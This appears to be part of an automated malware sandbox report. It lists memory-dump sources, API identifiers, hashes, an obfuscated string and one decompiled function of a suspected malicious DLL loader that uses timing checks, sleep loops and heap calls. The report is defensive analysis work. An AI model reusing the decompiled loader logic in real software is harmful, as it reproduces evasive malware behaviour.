                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D31F772908B858AE764CF25F84435AB6E2F789364F504039D68C97B78EB7CD158CF40
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2117243734.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117234477.000007FEF8F90000.00000002.00020000.sdmp
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117252147.000007FEF8F95000.00000002.00020000.sdmp
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117282688.000007FEF8F9E000.00000002.00020000.sdmp
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117292804.000007FEF8FA0000.00000002.00020000.sdmp
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                • API String ID: 4275171209-2766056989
                                                                                                                                                                                                                • Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                                • Instruction ID: d852fcecc8c65b33074624bcc973cb4eb89098c5c099dee049a95ff6459d2f31
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF326C76609BC48AD7B5CB56F49079AB7A5F7C9B90F10802AEACD93B18DB38C154CF01
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2109566650.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExitProcessSleepUser
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 354099737-0
                                                                                                                                                                                                                • Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                                • Instruction ID: b248c92643af6e86a2ba2c5abe2b16d8dab0787f217852e1677af44787d65faf
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03C08C30104684D3F31EBB20E8683E93235B300305F424619E303856E08F3C04C8C303
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2117243734.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117234477.000007FEF8F90000.00000002.00020000.sdmp
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117252147.000007FEF8F95000.00000002.00020000.sdmp
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117282688.000007FEF8F9E000.00000002.00020000.sdmp
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117292804.000007FEF8FA0000.00000002.00020000.sdmp
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                • Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                                • Instruction ID: 3adc23c25f3a0f1b8435709f589f86897b1c8289c5bdacba1448a615a5bf1034
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19D13F76509BC486D774CB4AE49039AB7A1F3C9790F10902AEACD93B68DF78C094CF40
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LookupAccountNameW.ADVAPI32 ref: 001B233C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2109566650.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AccountLookupName
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1484870144-0
                                                                                                                                                                                                                • Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                                • Instruction ID: 60f7399251d735b1e8cad7b8c0da10334775dee052dc7b02c6ac96509f9298b4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D316972705B418AEB109FB6E8443DA37A4FB48B88F588135EA4D57B29EF38C549C350
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 58%
                                                                                                                                                                                                                			E001B2434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
                                                                                                                                                                                                                				void* __rbp;
                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                				void* _t41;
                                                                                                                                                                                                                				signed long long _t51;
                                                                                                                                                                                                                				signed long long _t52;
                                                                                                                                                                                                                				signed long long _t64;
                                                                                                                                                                                                                				long long _t69;
                                                                                                                                                                                                                				void* _t73;
                                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                                				void* _t82;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t82 = __r9;
                                                                                                                                                                                                                				_t71 = __rsi;
                                                                                                                                                                                                                				_t69 = __rdi;
                                                                                                                                                                                                                				_t64 = __rdx;
                                                                                                                                                                                                                				_t52 = __rbx;
                                                                                                                                                                                                                				_t51 = __rax;
                                                                                                                                                                                                                				 *((long long*)(_t75 + 0x18)) = __rbx;
                                                                                                                                                                                                                				 *((long long*)(_t75 + 0x20)) = __rdi;
                                                                                                                                                                                                                				_t73 = _t75 - 0x57;
                                                                                                                                                                                                                				_t4 = _t52 + 4; // 0x4
                                                                                                                                                                                                                				_t40 = _t4;
                                                                                                                                                                                                                				goto L1;
                                                                                                                                                                                                                				L9:
                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                				L1:
                                                                                                                                                                                                                				asm("rdtsc");
                                                                                                                                                                                                                				_t64 = _t64 << 0x20;
                                                                                                                                                                                                                				_t51 = _t51 | _t64;
                                                                                                                                                                                                                				_t52 = _t52 << 0x00000010 | __rcx;
                                                                                                                                                                                                                				SleepEx(??, ??); // executed
                                                                                                                                                                                                                				_t69 = _t69 - 1;
                                                                                                                                                                                                                				if(_t69 != 0) {
                                                                                                                                                                                                                					goto L1;
                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                					wsprintfA();
                                                                                                                                                                                                                					E001B11FC(_t73 - 0x29, _t52);
                                                                                                                                                                                                                					_t37 = E001B153C(_t73 - 0x29);
                                                                                                                                                                                                                					E001B2C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
                                                                                                                                                                                                                					_t44 = _t51;
                                                                                                                                                                                                                					if(_t51 != 0) {
                                                                                                                                                                                                                						_t80 = _t73 + 0x67;
                                                                                                                                                                                                                						if(E001B1EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
                                                                                                                                                                                                                							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
                                                                                                                                                                                                                							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
                                                                                                                                                                                                                								_t27 = E001B272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
                                                                                                                                                                                                                								_t55 =  *((intOrPtr*)(_t73 + 0x67));
                                                                                                                                                                                                                								_t41 = _t27;
                                                                                                                                                                                                                								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
                                                                                                                                                                                                                									GetProcessHeap();
                                                                                                                                                                                                                									HeapFree(??, ??, ??);
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								E001B1FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
                                                                                                                                                                                                                								_t49 = _t51;
                                                                                                                                                                                                                								if(_t51 != 0) {
                                                                                                                                                                                                                									E001B2A1C(_t49, _t73 + 0x1b, _t51);
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                			}















                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2109566650.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                • Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                                • Instruction ID: c9da4ff87a2bc895bab384596edc4cc2c37c45b21341cafe2a5a99aac0f3a436
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0219272300A409AEF20EFB2E4543ED33A1F798784F994426EE4D57659EF38D549C350
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,001B1E13), ref: 001B264B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2109566650.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1721193555-0
                                                                                                                                                                                                                • Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                                • Instruction ID: 62c8b849bfd568ce1ef31c80dc291a9cddc16c83e20172e320ba1ef74a26f57a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3EE0ED3262454592EF11FB20E8543D97361FBD8704F844126A95E426A4EF3CCA5DC740
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2109566650.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                                                • Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                                • Instruction ID: 8f3362570e4ab31714775b751fca0485858bf91516d18a81d9f787fbf53f0960
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62D0A772E1424083F7309B10EA263DA3311F3D4315FD18206D54944554CF3CC158CA00
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000006.00000002.2120769781.000007FEF7721000.00000020.00020000.sdmp, Offset: 000007FEF7720000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000006.00000002.2120761015.000007FEF7720000.00000002.00020000.sdmp
                                                                                                                                                                                                                • Associated: 00000006.00000002.2120788613.000007FEF7725000.00000002.00020000.sdmp
                                                                                                                                                                                                                • Associated: 00000006.00000002.2120818332.000007FEF772E000.00000002.00020000.sdmp
                                                                                                                                                                                                                • Associated: 00000006.00000002.2120827808.000007FEF7730000.00000002.00020000.sdmp
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                • String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
                                                                                                                                                                                                                • API String ID: 4275171209-1517691801
                                                                                                                                                                                                                • Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                • Instruction ID: 93f30c298b5c7964164163bd4c588135ac9d966b2b59694c45ba5bbc7235fa4f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D151D3B252E6D0CAE3A18B24F49479BBFA0E785348F105158EADD4BB99C7BDC414CF44
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.2120769781.000007FEF7721000.00000020.00020000.sdmp, Offset: 000007FEF7720000, based on PE: true
• Associated: 00000006.00000002.2120761015.000007FEF7720000.00000002.00020000.sdmp
• Associated: 00000006.00000002.2120788613.000007FEF7725000.00000002.00020000.sdmp
• Associated: 00000006.00000002.2120818332.000007FEF772E000.00000002.00020000.sdmp
• Associated: 00000006.00000002.2120827808.000007FEF7730000.00000002.00020000.sdmp
Similarity
• API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
• String ID: DllRegisterServer$G$_
• API String ID: 1174013218-1650116920
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.2120769781.000007FEF7721000.00000020.00020000.sdmp, Offset: 000007FEF7720000, based on PE: true
• Associated: 00000006.00000002.2120761015.000007FEF7720000.00000002.00020000.sdmp
• Associated: 00000006.00000002.2120788613.000007FEF7725000.00000002.00020000.sdmp
• Associated: 00000006.00000002.2120818332.000007FEF772E000.00000002.00020000.sdmp
• Associated: 00000006.00000002.2120827808.000007FEF7730000.00000002.00020000.sdmp
Similarity
• API ID: AllocVirtual
• String ID: @
• API String ID: 4275171209-2766056989
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.2120769781.000007FEF7721000.00000020.00020000.sdmp, Offset: 000007FEF7720000, based on PE: true
• Associated: 00000006.00000002.2120761015.000007FEF7720000.00000002.00020000.sdmp
• Associated: 00000006.00000002.2120788613.000007FEF7725000.00000002.00020000.sdmp
• Associated: 00000006.00000002.2120818332.000007FEF772E000.00000002.00020000.sdmp
• Associated: 00000006.00000002.2120827808.000007FEF7730000.00000002.00020000.sdmp
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions